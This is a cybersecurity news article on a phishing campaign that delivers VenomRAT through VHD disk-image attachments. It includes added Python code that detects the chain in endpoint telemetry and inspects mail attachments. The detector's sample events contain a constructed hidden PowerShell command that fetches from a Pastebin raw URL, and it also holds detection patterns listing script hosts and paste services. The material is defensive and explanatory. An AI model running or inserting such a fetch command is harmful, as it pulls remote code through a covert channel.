Criminals are using a virtual hard disk image file to host and distribute dangerous malware


  • Forcepoint observes new phishing campaign distributing virtual hard disk files
  • The files bypass security protections to deploy the VenomRAT
  • Victims end up losing sensitive data, so be on your guard

Criminals are now using virtual hard disk image files to host and distribute dangerous malware, researchers from Forcepoint say.

In an in-depth analysis, Forcepoint said it observed a phishing campaign themed as a purchase order. The email attachment is an archive which, when extracted, contains a virtual hard disk image file (.VHD).

When the victim opens the file, it is mounted as a drive, and a batch script runs that is wrapped in several layers of obfuscation, including garbage characters, Base64 encoding and AES-encrypted files. The .BAT file drops the Venom Remote Access Trojan (RAT) and spawns a PowerShell script that uses the Pastebin service to host C2 and exfiltrate stolen data.
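The chain above (disk image mounted from a user directory, a script host launched from the mounted volume, a hidden or encoded PowerShell process, and a paste service used as the C2 rendezvous) can be turned into correlated detection rules. The following is an added example, not code from Forcepoint or from the article: the event shapes, rule names and sample events are constructed, hypothetical stand-ins for what an EDR or Sysmon pipeline would supply, and the paste services other than Pastebin are assumed members of the same class.

```python
"""Detection pass over constructed endpoint telemetry for a VHD -> .BAT -> PowerShell chain.

Event shapes are simplified, hypothetical stand-ins for what an EDR or Sysmon pipeline
would provide; the sample events below are constructed for this example.
"""
import re
from dataclasses import dataclass

# Directories a phished user typically saves or extracts attachments into.
USER_WRITABLE = re.compile(r"\\(Downloads|Temp|AppData|Desktop)\\", re.IGNORECASE)
DISK_IMAGE_EXTS = (".vhd", ".vhdx", ".iso", ".img")
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Paste services used as a C2 rendezvous; the article names Pastebin, the others are assumed.
PASTE_SERVICES = ("pastebin.com", "paste.ee", "hastebin.com")
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:enc|encodedcommand|ec)\b", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    severity: str
    event_index: int
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events: list) -> list:
    """Walk events in order, correlating disk-image mounts with later script execution."""
    findings = []
    image_volumes = {}  # drive letter -> image file it was mounted from

    for i, ev in enumerate(events):
        if ev["type"] == "vhd_mount":
            image_volumes[ev["volume"].upper()] = ev["path"]
            # R1: a disk image mounted straight out of Downloads/Temp is unusual for most users.
            if ev["path"].lower().endswith(DISK_IMAGE_EXTS) and USER_WRITABLE.search(ev["path"]):
                findings.append(Finding("R1-image-from-user-dir", "medium", i,
                                        f"disk image mounted from {ev['path']}"))
            continue
        if ev["type"] != "process_create":
            continue

        image = basename(ev["image"])
        cmd = ev["command_line"]

        # R2: a script host referencing a volume that came from a mounted disk image.
        if image in SCRIPT_HOSTS:
            for volume, source in image_volumes.items():
                if re.search(re.escape(volume) + r"\\", cmd, re.IGNORECASE):
                    findings.append(Finding("R2-script-from-mounted-image", "high", i,
                                            f"{image} ran content from {volume} (image: {source})"))
                    break

        if image in {"powershell.exe", "pwsh.exe"}:
            # R3: encoded command lines hide what the script does from simple inspection.
            if ENCODED_FLAG.search(cmd):
                findings.append(Finding("R3-encoded-powershell", "medium", i, "encoded command line"))
            # R4: paste services have no business in a purchase-order workflow.
            lowered = cmd.lower()
            hits = [s for s in PASTE_SERVICES if s in lowered]
            if hits:
                findings.append(Finding("R4-paste-service-c2", "high", i, f"contacts {hits[0]}"))
    return findings


SAMPLE_EVENTS = [  # constructed; mirrors the chain described in the article
    {"type": "vhd_mount", "volume": "E:",
     "path": r"C:\Users\alice\Downloads\PO-4471\PO-4471.vhd"},
    {"type": "process_create", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /c "E:\PO-4471.bat"'},
    {"type": "process_create", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -enc UExBQ0VIT0xERVI="},  # base64 of "PLACEHOLDER"
    {"type": "process_create", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -w hidden -c "Invoke-RestMethod https://pastebin.com/raw/EXAMPLE"'},
    {"type": "process_create", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\Scripts\inventory.ps1"},  # benign admin task
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity:6}] {f.rule} (event {f.event_index}): {f.detail}")
```

The point of keeping `image_volumes` as state is that R2 fires only when the script host's command line refers to a drive letter the pipeline has already seen mounted from an image file; on its own, `cmd.exe /c "E:\something.bat"` is not suspicious, which is exactly why the R1 mount event needs to be in the same stream.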

Working around security solutions

Forcepoint’s Prashant Kumar said the threat actors opted for a VHD file to work around any email security or endpoint protection solutions the target may have installed on their device.
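One reason the VHD-in-archive approach slips past mail filters is that many of them judge attachments by the outer file's extension only. The check below is an added example, not Forcepoint's or the article's code: it opens archive attachments, descends a bounded depth into nested zips, and flags disk-image members both by extension and by content signature (the VHD footer cookie, the VHDX file identifier and the ISO 9660 descriptor), so a renamed image is still caught. The archive, the stand-in VHD bytes and the file names are constructed for the example.

```python
"""Mail-gateway style inspection of an archive attachment for disk-image members.

Constructed example: the archive, the fake VHD bytes and the file names are all
made up here; the signature checks use the published VHD/VHDX/ISO magic values.
"""
import io
import zipfile
from typing import List, Optional

DISK_IMAGE_EXTS = {".vhd", ".vhdx", ".iso", ".img"}


def disk_image_signature(data: bytes) -> Optional[str]:
    """Identify a disk image by content rather than by name."""
    if data[:8] == b"vhdxfile":  # VHDX file identifier at offset 0
        return "vhdx"
    # VHD footer cookie; dynamic images also carry a copy at the head of the file.
    if data[:8] == b"conectix" or data[-512:][:8] == b"conectix":
        return "vhd"
    if len(data) > 0x8006 and data[0x8001:0x8006] == b"CD001":  # ISO 9660 volume descriptor
        return "iso"
    return None


def extension_of(name: str) -> str:
    return "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""


def inspect_attachment(name: str, data: bytes, depth: int = 0, max_depth: int = 2) -> List[str]:
    """Return one reason per disk-image indicator, descending into zip archives."""
    reasons = []
    ext = extension_of(name)
    if ext in DISK_IMAGE_EXTS:
        reasons.append(f"{name}: disk-image extension {ext}")
    kind = disk_image_signature(data)
    if kind:
        reasons.append(f"{name}: {kind} signature (declared as {ext or 'no extension'})")
    if depth < max_depth and zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                for r in inspect_attachment(info.filename, zf.read(info), depth + 1, max_depth):
                    reasons.append(f"{name} -> {r}")
    return reasons


def should_quarantine(name: str, data: bytes) -> bool:
    """Policy hook: any disk-image indicator in the attachment tree blocks delivery."""
    return bool(inspect_attachment(name, data))


def make_fake_vhd() -> bytes:
    """Stand-in for a VHD: not a valid image, only carries the footer cookie."""
    return b"\x00" * 512 + b"conectix".ljust(512, b"\x00")


def build_sample_archive() -> bytes:
    """Constructed 'purchase order' archive: a .vhd, a renamed .vhd and a harmless text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("PO-4471/PO-4471.vhd", make_fake_vhd())
        zf.writestr("PO-4471/invoice.dat", make_fake_vhd())  # extension changed, signature intact
        zf.writestr("PO-4471/readme.txt", b"Please review the attached purchase order.\n")
    return buf.getvalue()


if __name__ == "__main__":
    archive = build_sample_archive()
    for reason in inspect_attachment("PO-4471.zip", archive):
        print(reason)
    print("quarantine:", should_quarantine("PO-4471.zip", archive))
```

The depth bound matters in production: nested archives are a common way to exhaust a scanner, so the recursion stops at `max_depth` and anything deeper should be treated as unscannable rather than clean.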

“Threat actors always like to find new ways to deliver malware undetected to target large communities,” Kumar said. “I’ll cover a current technique threat actors use to bypass security measures, deliver malware, infect systems and exfiltrate data—all by using a virtual hard disk image file to host and distribute the VenomRAT malware.”

VenomRAT is a type of Trojan that allows cybercriminals to take full control of an infected system. Once installed, it enables attackers to execute commands remotely, steal sensitive information, and manipulate the victim's computer without their knowledge. It is commonly used for keylogging and extracting saved credentials from web browsers and applications.

This malware is also capable of capturing screenshots and activating webcams, employs various persistence mechanisms, and can deploy additional malware. Because of its powerful capabilities, VenomRAT is often distributed through phishing emails, malicious downloads, and exploit kits that target system vulnerabilities.


Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

